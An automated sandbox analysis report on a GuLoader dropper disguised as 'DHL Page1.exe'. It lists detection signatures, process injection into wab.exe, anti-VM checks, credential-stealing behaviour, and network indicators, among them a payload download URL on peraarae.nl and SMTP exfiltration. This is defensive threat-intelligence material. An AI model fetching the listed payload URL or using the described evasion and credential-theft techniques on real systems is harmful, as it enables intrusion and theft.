Edit tour

Windows Analysis Report
DHL Page1.exe

Overview

General Information

Sample name:	DHL Page1.exe
Analysis ID:	1501086
MD5:	e563153089b05a25e30db0a73e196b10
SHA1:	fb098be6dc900c18c83b53681cc0fd2c976fe638
SHA256:	dbd76943d4c2efa432805b8458e970c2b6c6d76c16ff4d2a7d63df50ad0330af
Infos:

Detection

GuLoader

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

DHL Page1.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\DHL Page1.exe" MD5: E563153089B05A25E30DB0A73E196B10)

wab.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\DHL Page1.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.127076986570.00000000377C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.123227921774.0000000007E0B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.253.62.108, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 2640, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49844

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 104.153.208.178

Timestamp:	2024-08-29T12:24:47.936144+0200
SID:	2803270
Severity:	2
Source Port:	49842
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL Page1.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: DHL Page1.exe	ReversingLabs: Detection: 13%
Source: DHL Page1.exe	Virustotal: Detection: 13%			Perma Link

Source: DHL Page1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49843 version: TLS 1.2

Source: DHL Page1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_00406577 FindFirstFileW,FindClose,	0_2_00406577
Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_0040287E FindFirstFileW,	0_2_0040287E
Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_00405A25 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405A25

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49842 -> 104.153.208.178:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ViaMYxizkt11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: peraarae.nlCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ViaMYxizkt11.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: peraarae.nlCache-Control: no-cache

Source: wab.exe, 00000004.00000002.127076986570.0000000037BA9000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.00000000378E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.comTRUE/FALSE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
Source: wab.exe, 00000004.00000002.127076986570.00000000378E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.comTRUE/FALSE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2"h equals www.linkedin.com (Linkedin)
Source: wab.exe, 00000004.00000002.127078477032.0000000038789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: wab.exe, 00000004.00000002.127078477032.0000000038789000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)

Source: global traffic	DNS traffic detected: DNS query: peraarae.nl
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: smtp.gmail.com

Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://c.pki.goog/wr2/75r4ZyA3vA0.crl0
Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/r1.crt0
Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://i.pki.goog/wr2.crt0
Source: DHL Page1.exe, 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL Page1.exe, 00000000.00000000.121985944583.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wab.exe, 00000004.00000002.127055355924.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://o.pki.goog/wr20%
Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr10)
Source: wab.exe, 00000004.00000002.127066946181.0000000007A40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://peraarae.nl/ViaMYxizkt11.bin
Source: wab.exe, 00000004.00000002.127079942978.0000000039B00000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000004.00000002.127080050541.0000000039BCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
Source: wab.exe, 00000004.00000002.127076986570.0000000037B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.gmail.com
Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: wab.exe, 00000004.00000002.127080050541.0000000039B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49843 version: TLS 1.2

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_004054D2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004054D2

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_0040346C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040346C

Source: C:\Users\user\Desktop\DHL Page1.exe	File created: C:\Windows\resources\0409			Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	File created: C:\Windows\SysWOW64\Dogmefastes.lnk			Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_00406A4D	0_2_00406A4D
Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_00404D0F	0_2_00404D0F
Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_00407224	0_2_00407224
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_004741C8	4_2_004741C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_0047A978	4_2_0047A978
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_0047DA30	4_2_0047DA30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_00474A98	4_2_00474A98
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_00473E80	4_2_00473E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_0047E750	4_2_0047E750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A565698	4_2_3A565698
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A5677D0	4_2_3A5677D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A560040	4_2_3A560040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A563C60	4_2_3A563C60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A56E140	4_2_3A56E140
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A56D1F2	4_2_3A56D1F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A569640	4_2_3A569640
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A564022	4_2_3A564022
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_3A560012	4_2_3A560012

Source: DHL Page1.exe

Static PE information: invalid certificate

Source: DHL Page1.exe

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: DHL Page1.exe, 00000000.00000000.121986016582.000000000049C000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameeksposeets overklipning.exeDVarFileInfo$ vs DHL Page1.exe

Source: DHL Page1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@3/12@3/3

Source: C:\Users\user\Desktop\DHL Page1.exe

0_2_0040346C

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_00404793 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404793

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_00402104

Source: C:\Users\user\Desktop\DHL Page1.exe

File created: C:\Program Files (x86)\eudaemons.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\DHL Page1.exe

File created: C:\Users\user\AppData\Local\Temp\nsw38A0.tmp

Jump to behavior

Source: DHL Page1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\DHL Page1.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DHL Page1.exe	ReversingLabs: Detection: 13%
Source: DHL Page1.exe	Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\DHL Page1.exe

File read: C:\Users\user\Desktop\DHL Page1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL Page1.exe "C:\Users\user\Desktop\DHL Page1.exe"
Source: C:\Users\user\Desktop\DHL Page1.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\DHL Page1.exe"
Source: C:\Users\user\Desktop\DHL Page1.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\DHL Page1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: fontext.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: fms.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\DHL Page1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Milliluxes.lnk.0.dr	LNK file: ..\..\..\Windows\Fonts\vlgerne\construction.Bes231
Source: Dogmefastes.lnk.0.dr	LNK file: ..\..\Users\user\AppData\Local\Temp\uddannelsesfiler\Maaneraket.uds
Source: Milliluxes.lnk0.0.dr	LNK file: ..\..\..\Windows\Fonts\vlgerne\construction.Bes231

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: DHL Page1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.123227921774.0000000007E0B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL Page1.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\DHL Page1.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_00470C4F push ebx; retf	4_2_00470C52
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_00470C6D push edi; retf	4_2_00470C7A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 4_2_00470CCB push edi; retf	4_2_00470C7A

Source: C:\Users\user\Desktop\DHL Page1.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\LangDLL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\DHL Page1.exe	File created: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\DHL Page1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL Page1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
